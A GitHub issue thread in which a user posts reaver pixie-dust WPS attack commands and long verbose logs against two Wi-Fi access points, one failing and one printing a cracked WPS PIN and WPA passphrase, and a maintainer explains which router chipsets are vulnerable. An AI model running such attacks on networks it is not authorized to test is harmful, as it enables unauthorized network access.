t6x/reaver-wps-fork-t6x #345: 2 pixie attacks same kind of output but  1 out of 2 successful

algreen702021, 2021-08-21:
A) technicolor  789vac v2 - No success

```
reaver -i wlan1 -c 112 -b  XX XX XX:8B:26:44 -vvv -L -N -K                                                                  130 ⨯

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan1 to channel 112
[+] Waiting for beacon from XX XX XX:8B:26:44
[+] Received beacon from XX XX XX:8B:26:44
[+] Vendor: Broadcom
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with XX XX XX:8B:26:44 (ESSID: tech-234431)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=407 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 1d a5 f2 67 ba e1 5c d9 a0 49 fb ee 1c 4a 72 53
WPS: Enrollee MAC Address a6:91:b1:8b:26:44
WPS: Enrollee Nonce - hexdump(len=16): 16 fa 86 5d 41 b7 69 5e 91 c4 ff 5b 4a 77 a2 1d
WPS: Enrollee Authentication Type flags 0x23
WPS: No match in supported authentication types (own 0x0 Enrollee 0x23)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xd
WPS: No match in supported encryption types (own 0x0 Enrollee 0xd)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x268c [Label] [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=11):
     54 65 63 68 6e 69 63 6f 6c 6f 72                  Technicolor     
WPS: Model Name - hexdump_ascii(len=14):
     4d 65 64 69 61 41 63 63 65 73 73 20 54 47         MediaAccess TG  
WPS: Model Number - hexdump_ascii(len=9):
     37 38 39 76 61 63 20 76 32                        789vac v2       
WPS: Serial Number - hexdump_ascii(len=9):
     31 38 33 38 55 41 30 4b 41                        1838UA0KA       
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=7):
     41 47 43 4f 4d 42 4f                              AGCOMBO         
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
[... 313 lines cut ...]
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[+] Updated P1 array
[+] Updated P2 array
[+] Quitting after pixiewps attack
[+] Pin cracked in 6 seconds
[+] WPS PIN: '39801296'
[+] WPA PSK: '12345678'
[+] AP SSID: 'tp-linkAD234CBA'
```
Using RT8812au chipset, same results with alfa AW036nHA and Alfa AC1900 8814au.            
Any clue?
Regards

kcdtv, 2021-09-16:
The first attack is against a broadcom device. Only a few devices are supported (by devices i mean access points) and the attack will probably fail (like in your case) 
The second attack is against a mediatek (previously called Ralink) and it is highly effective (and immediate).  
For more information refer to [pixie dust thread (in Kali forum)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)) & [Dominique Bongard's full disclosure](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing)

closed 2021-09-16 by kcdtv

ChillVibesMushroom, 2022-02-28:
> The first attack is against a Broadcom device (--mode 1). Only a few devices are supported (by "device" i mean access points) and the attack will probably fail (like in your case) The second attack is against a Mediatek device (previously called Ralink). It is highly effective and immediate. For more information refer to [pixie dust thread (in Kali forum)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)) & [Dominique Bongard's full disclosure](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing)

How long did it take